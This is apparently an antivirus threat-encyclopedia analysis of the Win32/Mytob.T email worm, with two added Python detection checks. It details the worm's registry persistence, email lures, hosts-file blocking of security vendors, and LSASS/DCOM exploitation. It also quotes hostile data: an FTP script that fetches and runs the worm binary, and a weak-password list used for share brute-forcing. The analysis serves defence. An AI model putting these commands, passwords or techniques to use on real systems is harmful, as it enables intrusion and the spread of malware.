Threat Encyclopedia


Win32/Mytob.T

MyTob.T is a typical mass-mailing e-mail worm. The file is 51062 bytes in size and is runtime-compressed with UPack, an executable runtime packer.

Note: In the following text, %windir% denotes the Windows directory (e.g. C:\WINDOWS) and %system% denotes the Windows System directory (e.g. C:\WINDOWS\SYSTEM32), as these differ between versions of Microsoft Windows.

Installation and Autostart Techniques

Upon execution the worm copies itself into the %system% folder (System32) as "taskgmr.exe" and creates a second self-copy named NETHELL.EXE.

It also drops a component, HELLMSN.EXE, in the root directory, which is usually C:\.
NOD32 detects this dropped component as W32/Mytob.J (MSN Messenger spreading component).

Mytob.T creates self-copies directly in the root directory:

funny_pic.scr
my_photo2005.scr
see_this!!.scr

The worm creates a mutex "ggmutexk2" to prevent multiple instances of the worm from running on one machine.
The worm adds the following registry values to make sure that it runs every time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmr.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINTASK" = "taskgmr.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmr.exe"

MyTob.T also adds the following registry values:

HKLM\Software\Microsoft\OLE
"WINTASK" = "taskgmr.exe"

HKCU\Software\Microsoft\OLE
"WINTASK" = "taskgmr.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmr.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmr.exe"

Note: The worm continuously watches for the presence of these registry values and recreates them if they have been removed.

E-mail harvesting

The worm scans all fixed disks and collects e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

However, this extension list is effectively useless, because the worm has a bug in the way it concatenates and compares strings against the WIN32_FIND_DATA results: it checks the extension with a substring ('instr'-style) function instead of an exact comparison.
As a result, the worm opens and scans a file for e-mail addresses whenever its extension matches at least one character of a listed extension, in the correct order.

Example: files with the extension .htm, .ht or .h, for instance, are all searched for e-mail addresses.

DNS resolving

The worm performs DNS MX (mail exchange) queries to find an appropriate mail server for each domain it tries to send itself to. If the DNS request for the mail server fails, the worm tries to guess the mail server by prepending the following prefixes to the domain name:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.

E-mail Sender

The worm generates the sender's e-mail address using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

to which it randomly appends one of the following domain names (the domain names are stored encrypted in the worm):

aol.com cia.gov fbi.gov hotmail.com juno.com msn.com yahoo.com

It uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail subjects

MyTob.T randomly selects an e-mail subject from the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

Note: The e-mail subjects are stored encrypted in the worm.

Message Body

The e-mail contains one of the following message texts:

Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
The original message was included as an attachment.
Here are your banks documents.

Note: The worm may also send e-mails containing a blank message body or random strings.

E-mail Attachments

The worm attaches a self-copy under one of the following file names:

body
message
test
data
file
text
doc
readme
document

with one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

htm
txt
doc

The second extension is chosen from the following list and is separated from the first extension by a large number of spaces, so that the executable file extension is hidden from view:

pif
scr
exe

Example: the attachment "text.zip" may contain the file "text.txt { spaces }.scr".
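A detection check for the attachment conventions described above, written as an added example (it is not code from the original entry or from the worm): it flags attachment names built from the listed name and extension lists, and inspects a ZIP archive for member names that hide an executable extension behind a run of spaces. The sample archive is constructed in the code, and the threshold of two or more spaces is an assumption.

```python
import io
import re
import zipfile

# Attachment file names and extensions taken from the lists above.
ATTACHMENT_NAMES = {"body", "message", "test", "data", "file",
                    "text", "doc", "readme", "document"}
ATTACHMENT_EXTS = {"bat", "cmd", "exe", "scr", "pif", "zip"}

# Decoy extension, a run of whitespace (assumed: two or more), then the
# real executable extension, e.g. "text.txt<spaces>.scr".
PADDED_DOUBLE_EXT = re.compile(r"\.(htm|txt|doc)\s{2,}\.(pif|scr|exe)$",
                               re.IGNORECASE)


def is_mytob_style_attachment(filename: str) -> bool:
    """True if the name is <listed name>.<listed extension>, case-insensitively."""
    stem, sep, ext = filename.lower().rpartition(".")
    return sep == "." and stem in ATTACHMENT_NAMES and ext in ATTACHMENT_EXTS


def suspicious_zip_members(zip_bytes: bytes) -> list[str]:
    """Return archive member names that hide an executable extension behind padding."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if PADDED_DOUBLE_EXT.search(name)]


def build_sample_zip() -> bytes:
    """Constructed sample archive: one padded double-extension member, one benign member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("text.txt" + " " * 120 + ".scr", b"placeholder, not a real payload")
        zf.writestr("report.txt", b"plain text")
    return buf.getvalue()


if __name__ == "__main__":
    print(suspicious_zip_members(build_sample_zip()))
    print(is_mytob_style_attachment("document.pif"))
```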

The worm avoids e-mail addresses that contain any of the following strings:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley,
borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs,
google, gov., help, hotmail, iana, ibm.com, icrosof, icrosoft, ietf, info, inpris, isc.o,
isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai,
noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe.,
root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho,
spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster,
www, you, your, -._!, -._!@

Note: the first character is deliberately left out of some entries so that they match regardless of its case; for instance, "icrosoft" matches both "Microsoft" and "microsoft".

Hostfile Manipulation

It overwrites the existing "hosts" file with the following entries so that these sites can no longer be reached:

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.trendmicro.com
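A check for the hosts-file manipulation described above, written as an added example (not code from the original entry): it parses hosts-file text and reports entries that sinkhole one of the listed security-vendor domains or any of their subdomains. It goes slightly beyond the entry by also treating 0.0.0.0 and ::1 as sinkhole addresses; the sample hosts content is constructed.

```python
import ipaddress

# Vendor domains taken from the hosts entries above (registrable domains only,
# so that any subdomain such as liveupdate.symantec.com is covered).
BLOCKED_VENDOR_DOMAINS = {
    "symantec.com", "symantecliveupdate.com", "sophos.com", "mcafee.com",
    "viruslist.com", "f-secure.com", "kaspersky.com", "avp.com",
    "networkassociates.com", "ca.com", "my-etrust.com", "nai.com",
    "trendmicro.com", "microsoft.com",
}

# Constructed sample: a comment, localhost, two vendor redirects, one legitimate entry.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1 www.symantec.com
127.0.0.1\tliveupdate.symantecliveupdate.com   # trailing comment
192.168.1.10 fileserver.corp.example
"""


def _is_sinkhole(addr: str) -> bool:
    """Loopback or unspecified addresses (127.0.0.1, ::1, 0.0.0.0) swallow traffic."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def _matches_vendor(hostname: str) -> bool:
    """True if hostname is a listed vendor domain or a subdomain of one."""
    labels = hostname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in BLOCKED_VENDOR_DOMAINS
               for i in range(len(labels) - 1))


def hijacked_hosts_entries(hosts_text: str) -> list[tuple[str, str]]:
    """Return (address, hostname) pairs that sinkhole a security-vendor domain."""
    hits = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        if _is_sinkhole(addr):
            hits.extend((addr, n) for n in names if _matches_vendor(n))
    return hits


if __name__ == "__main__":
    for addr, name in hijacked_hosts_entries(SAMPLE_HOSTS):
        print(f"{addr} -> {name}")
```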

Network Distribution (Shares)

The worm scans for shared folders and tries to gain write access using the following weak passwords:

(blank password)
!@#$ !@#$% !@#$%^ !@#$%^& !@#$%^&* % 0 00 000 0000 00000
000000 00000000 007 0wn3d 0wned 1 110 111 111 111111 11111111 11111111 12 121
121212 123 123123 123321 1234 12345 123456 1234567 12345678 123456789 12346
123467 1234678 12346789 123467890 1234qwer 123abc 123asd 123qwe 2002 2003 2600
54321 54321 54321 654321 654321 aaa abc abc123 abcd ACCESS access account accounts adm admin ADMIN Admin admin123 Administrador Administrateur administrator ADMINISTRATOR Administrator guest GUEST Guest pass pass123 pass1234 passphra passwd password PASSWORD Password password1 password123 unknown Unknown user USER User user1 usermane username userpassword win win2000 win2k win98 windose windows windows2k windows95 windows98 windowsME WindowsXP windowz windoze windoze2k windoze95 windoze98 windozeME windozexp wine wing winnt winpass winston winxp wired xp xx xxx xxxx xxxxx xxxxxx xxxxxxx xxxxxxxx xxxxxxxxx 007 test none changeme default system server null qwerty mail outlook web www internet accounts accounting home homeuser user user1 oem oemuser qaz asd qwe mike john peter luke ron sam barbara mary sue susan joan joe peter fred frank brian spencer lee neil ian george bruce kate katie login loginpass owa sage technical backup exchange exchnge fuck sex god hell fish heaven orange domain domainpass domainpassword database access dbpass dbpassword databasepass data databasepassword db1 db1234 sql sqlpass sa cisco dell compaq siemens yellow pink xp control mass office blank winpass capitol userpassword main hq headoffice ctx nokia lan internet intranet bill fred freddy
glen turnip afro user1 student student1 teacher staff oeminstall root Root ROOT CISCO Cisco

If the worm succeeds in accessing a shared folder, it drops one of the following files:

Admin$\system32\taskgmr.exe
Admin$\taskgmr.exe
ipc$\system32\taskgmr.exe
ipc$\taskgmr.exe
print$\system32\taskgmr.exe
print$\taskgmr.exe
c$\winnt\system32\taskgmr.exe
c$\taskgmr.exe
d$\taskgmr.exe
lwc$\taskgmr.exe
NETLOGON\taskgmr.exe
SYSVOL\taskgmr.exe
profiles$\taskgmr.exe
e$\taskgmr.exe

Exploiting technologies

The worm generates random IP addresses and attempts to connect to port 445 of the generated IPs to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the exploit succeeds, it executes code (shellcode) on the target machine which instructs it to connect back to the source in order to retrieve a copy of the worm. (The copy is transferred to the target machine over an FTP connection to the source, driven by the 2pac.txt FTP command file.)

The worm also takes advantage of the DCOM RPC vulnerability [see MS03-026] for spreading.
The 2pac.txt file contains the following FTP commands:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The worm runs FTP.EXE locally on the compromised system to retrieve a copy of the worm named "bingoo.exe" from the connecting system, and executes that file once the download completes.

References:
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Other Details:

The worm also provides IRC backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer

The worm is able to send copies via MSN Messenger to all online contacts in the contact list.